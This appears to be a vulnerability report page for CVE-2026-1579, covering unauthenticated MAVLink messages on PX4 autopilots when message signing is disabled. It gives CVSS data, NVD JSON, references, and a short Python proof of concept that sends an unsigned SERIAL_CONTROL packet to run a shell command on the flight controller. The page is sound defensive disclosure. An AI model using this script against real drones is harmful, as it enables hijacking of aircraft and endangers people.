Security Vulnerability Report
中文
CVE-2026-1579 CVSS 9.8 CRITICAL

CVE-2026-1579

Published: 2026-03-31 21:16:28
Last Modified: 2026-04-07 15:33:30
Source: [email protected]

Description

The MAVLink communication protocol does not require cryptographic authentication by default. When MAVLink 2.0 message signing is not enabled, any message -- including SERIAL_CONTROL, which provides interactive shell access -- can be sent by an unauthenticated party with access to the MAVLink interface. PX4 provides MAVLink 2.0 message signing as the cryptographic authentication mechanism for all MAVLink communication. When signing is enabled, unsigned messages are rejected at the protocol level.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:px4:autopilot:1.16.0:*:*:*:*:*:*:* - VULNERABLE
MAVLink (未启用2.0消息签名的版本)
PX4 (未配置强制消息签名的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys from pymavlink import mavutil # Connect to the target MAVLink system (UDP example) # Replace with target IP and port master = mavutil.mavlink_connection('udpout:127.0.0.1:14550') # Wait for a heartbeat to establish connection master.wait_heartbeat() # Target system and component (usually 1, 1) target_system = 1 target_component = 1 # Exploit: Send SERIAL_CONTROL message to execute command # This sends a command without signing if signing is not enforced command = "uname -a\n" master.mav.serial_control_send( target_system, # System ID target_component, # Component ID mavutil.mavlink.SERIAL_CONTROL_DEV_ENUM_SHELL, # Open shell 0, # Flags 0, # Timeout len(command), # Bytes to write 0, # Unused command.encode('utf-8') # The command bytes ) print("[+] Exploit packet sent: SERIAL_CONTROL with shell command.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1579", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:27.897", "lastModified": "2026-04-07T15:33:30.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MAVLink communication protocol does not require cryptographic \nauthentication by default. When MAVLink 2.0 message signing is not \nenabled, any message -- including SERIAL_CONTROL, which provides \ninteractive shell access -- can be sent by an unauthenticated party with\n access to the MAVLink interface. PX4 provides MAVLink 2.0 message \nsigning as the cryptographic authentication mechanism for all MAVLink \ncommunication. When signing is enabled, unsigned messages are rejected \nat the protocol level."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:px4:autopilot:1.16.0:*:*:*:*:*:*:*", "matchCriteriaId": "80FAE422-6055-42B3-ADC2-C1D72B7C309B"}]}]}], "references": [{"url": "https://docs.px4.io/main/en/mavlink/message_signing", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://docs.px4.io/main/en/mavlink/security_hardening", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-090-02.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-090-02", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.